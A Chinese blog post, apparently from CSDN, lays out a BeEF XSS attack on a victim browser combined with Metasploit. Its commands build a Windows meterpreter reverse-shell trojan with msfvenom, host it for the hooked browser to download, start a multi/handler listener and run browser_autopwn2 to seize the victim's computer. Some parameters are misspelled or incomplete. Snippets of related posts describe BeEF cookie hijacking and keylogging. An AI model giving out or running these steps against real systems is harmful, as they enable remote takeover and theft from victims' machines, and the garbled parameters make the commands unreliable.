XSS - beef(使用)

最新推荐文章于 2024-05-09 16:26:31 发布
最新推荐文章于 2024-05-09 16:26:31 发布
阅读量1.4k 收藏 7
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45273343/article/details/103224389
版权

beef(获取电脑权限)

1、命令行敲,进入beef界面
beef-xss

2、输入账号密码,beef、beef,然后在命令行敲,启动 apache2 服务
service apache2 start

beef - Firefox

msfvenom — 制作木马
1、先在命令行下载好payload;
msfvenom -p windows/meterpreter/reverse_tcp LHSOT=192.168.43.128 LPORT=4444 -f exe -o /root/Desktop/yucedu.exe
2、将下载好的payload移动到 html 下面;
mv /root/Desktop/yucedu.exe /var/www/html

3、进入 beef 中 firefox 的界面;
修改url:kaili IP地址和文件名(yucedu.exe)
Not:界面显示语句话语;

靶机浏览器界面上方会出现,下载按钮;

msfconsole — 监听(获取权限一)
1、先进入msf控制台
msfconsole
2、使用=进入
use exploit/multi/handler
3、设置payload(防止在前面设置的时候出现错误)
set payload windows/meterpreter/reverse_tcp
4、设置攻击机IP地址
set LHOST 192.168.43.128
5、设置攻击机端口号
set LPORT 4444
6、查看命令显示
show options
7、开启攻击
run / exploit

修改编码为GDB
mkdir mouse 进入桌面建立 mouse文档

攻击电脑权限(获取权限二)
1、查看回显;
search browser_auto
2、使用浏览器自动攻击的第二个版本;
use pwn2
3、查看配置参数
show options
4、设置IP地址
set srvhost kali的IP地址
5、设置端口
set
6、设置目录为根目录
set uripath /
7、查看配置情况
show options
8、设置IP地址
set IHOST kali的IP地址
9、查看配置情况(再次查看)
show options
10、开启攻击,开启监听
exploit

设置完成之后,等待受害者访问恶意站点,匹配合适的攻击模式进行攻击,获取受害着的电脑权限;
有时候会不稳定,跟版本有关;

天威一号
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
xss漏洞以及beef使用
young‘s blog
07-20 3061
这次的xss漏洞就从dvwa开始吧。 反射型: 先是low级别的,输入1后页面变为 这次尝试一下burpsuite里自带的扫描器。 首先不得不说dvwa设计有一些缺陷,有时候等级改不过去,这就让人很蛋疼,所以还是要自己手动改一下。就因为这个,扫描器一直扫不出来。用了改过之后的包就可以扫描了。上图 可以看到箭头指向的就是payload 看一下返回页面,就是弹框1了。没啥别的。 抓一下返回包看一看 可...
kali之beef使用
whoim_i的博客
11-03 2万+
目录一、beef介绍二、kali下使用beef配置beef实际操作 一、beef介绍 BeeF是前欧美最流行的web框架攻击平台,kali 集成Beef,而且Beef有很多好使的payload。例如,通过XSS这个简单的漏洞,BeeF可以通过一段编制好的javascript控制目标主机的浏览器,通过浏览器拿到各种信息并且扫描内网信息,同时能够配合metasploit进一步渗透主机,强大的有些吓人。...
网络安全最全Beefxss使用教程图文教程(超详细)_怎么把beef改成公网ip(3),2024春招面试
最新发布
2401_84302816的博客
05-09 592
beef-XSS界面有很多栏,重点是 Commands 栏的功能指令,其他的基本用不到,不用太留意。Online Browsers:在线浏览器,工具定时发送链接请求,链接成功就会显示在这里。Offline Browsers:离线浏览器Getting Started:入门指南,官方的一些文档Logs:日志,记录工具做过哪些操作Zombies:僵尸,记录可以利用的目标站点Current Browser:上线的浏览器,只有在目标在线的时候才会显示出来。
跨站脚本攻击--利用BeEF 执行 XSS 攻击
weixin_69826880的博客
06-26 623
跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。靶场:kali(攻击者),32位win7(被攻击者)攻击环境:kali安装BEEF,32位win7站点搭建BeEF是日前最强大的浏览器开源渗透测试框架,通过X55漏洞配合JS脚本和 Metasploit进行渗透;BeEF是基于Ruby语言编写的,并且支持图形化界面,操作简单。
beef-xss详细教程(一文带你学会beef) | Kali下安装beef | beef-xss反射型,储存型利用 | beef实现Cookie会话劫持 | 键盘监听 | 浏览器弹窗,重定向等
Martin-share的博客
02-12 1万+
beef-xss详细教程(一文带你学会beef) | Kali下安装beef | beef-xss反射型,储存型利用 | beef实现Cookie会话劫持 | 键盘监听 | 浏览器弹窗,重定向等
beef利用xss漏洞实现攻击
m0_61506558的博客
08-22 1128
beef是一个XSS平台,有非常多的功能Exploit 模块用的最多,但初学者用Browser就足够了Beef-XSS平台基本使用 https://www.bilibili.com/video/av92711691/
Web应用安全:XSS通过JavaScript攻击(实验).docx
06-20
在Kali上安装beef-xss工具; 在站点上进行XSS JavaScript攻击。 (附加题)使用beef尝试更多XSS JavaScript功能。 三、实验内容与步骤 在Kali上安装beef-xss工具: 1.1、首先打开Kali,将kali的下载源换成国内中科大...
BeefAuto:无需配置路由器即可自动化 Beef 以通过广域网使用
07-24
python脚本自动化牛肉并通过使用ngrok打开端口将其配置为使用overwan 截图 安装 [ 卡利 ] git 克隆 cd BeefAuto 须藤 pip3 install -r requirements.txt 须藤 bash install.sh 须藤 python3 main.py 经过以下...
Web应用安全:XSS篡改页面(实验).docx
06-19
我们将使用beef-xss工具来攻击pikachu站点,模拟用户登录pikachu站点,然后在beef-xss平台上控制用户的浏览器,实施各种篡改页面攻击。 实验环境准备: 1. 首先,我们需要在Kali Linux系统中安装beef-xss工具。...
网络渗透测试 XSS和SQL注入
12-02
实验目的:了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;...系统环境:Kali Linux 2、Windows Server网络环境:交换网络结构实验工具: Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA
JSShell:交互式多用户Web JS Shell
02-05
该工具可以轻松地附加到XSS(跨站点脚本)有效负载,以实现浏览器远程代码执行(类似于BeeF框架)。 2.0版完全从头开始创建,引入了令人兴奋的新功能,稳定性和可维护性。 版本:2.0 作者 。 壳牌影片 产品特点 ...
beef的简单使用
weixin_44940180的博客
07-23 3478
beef Beef主要是往网页中插入一段名为hook.js的JS脚本代码,如果浏览器访问了有hook.js(钩子)的页面,就会被hook(勾住),勾连的浏览器会执行初始代码返回一些信息,接着目标主机会每隔一段时间(默认为1秒)就会向BeEF服务器发送一个请求,询问是否有新的代码需要执行 Beef服务器本质上就像一个Web应用,被分为前端和后端。前端会轮询后端是否有新的数据需要更新,同时前端也可以向后端发送指示, BeEF持有者可以通过浏览器来登录 BeEF 的后端,来控制前端(用户的浏览器) Beef一般和
Linux自动化简单安装beef xss framework的方法及BeEF的启动
01-28 3551
Linux中BeEF的安装
beef-xss软件使用教程
weixin_44717303的博客
05-24 733
beef-xss教程实验环境打开beefxss登录 dvwa难度调到low 实验环境 beef-xss+kali2021 打开beefxss 打开对应的网址并登录 http://192.168.2.157:3000/ui/panel 然后我们回到虚拟机找到hook地址 登录 dvwa难度调到low
BeEF-XSS详细使用教程
热门推荐
星落的博客
05-12 4万+
BeEF-XSS简介 BeEF-XSS是一款非常强大的web框架攻击平台,集成了许多payload,可以实现许多功能! 启动BeFF-XSS BeEF-XSS管理登录页面 用户名默认为beef,密码在首次启动beef-xss时需要手动设置。(启动beef-xss会自动打开浏览器) BeEF-XSS主页面介绍 Hocked Browers online browers 在线浏览器 offline browers 离线浏览器 Detials 浏览器、插件版本信息,操作系统信息 L.
BeEF新手记录
OldBowl
11-29 2853
beef 新手
BeEF使用
谢公子的博客
09-17 1万+
目录 BeEFBeEF-XSS使用 获取用户Cookie 网页重定向 社工弹窗 钓鱼网站(结合DNS欺骗) BeEF BEEF (The Browser Exploitation Framework):一款浏览器攻击框架,用Ruby语言开发的,Kali中默认安装的一个模块,用于实现对XSS漏洞的攻击和利用。 BeEF主要是往网页中插入一段名为hook.js的JS脚本代...
Beef-xss安装及使用
qq_40624810的博客
12-10 7400
一、背景 BeEF是The Browser Exploitation Framework的缩写。它是一种专注于Web浏览器的渗透测试工具。 随着对包括移动客户端在内的客户网络攻击的担忧日益增加,BeEF允许专业渗透测试人员使用客户端攻击媒介来评估目标环境的实际安全状况。与其他安全框架不同,BeEF超越了强化的网络边界和客户端系统,并在一个开放的环境中检查可利用性:Web浏览器。BeEF将挂钩一个或多个Web浏览器,并将它们用作启动定向命令模块以及从浏览器上下文中对系统进一步攻击的滩头阵地。 BeEF
web安全之kali-xss-beef剑心哥哥
12-24
结合使用Kali Linux、XSSBeEF可以帮助“剑心哥哥”对网站进行全面的安全检测,并了解和利用XSS漏洞来展示其危害性。同时,也需要“剑心哥哥”具备一定的伦理和法律意识,不能利用这些工具进行非法攻击和侵犯他人...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

天威一号

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值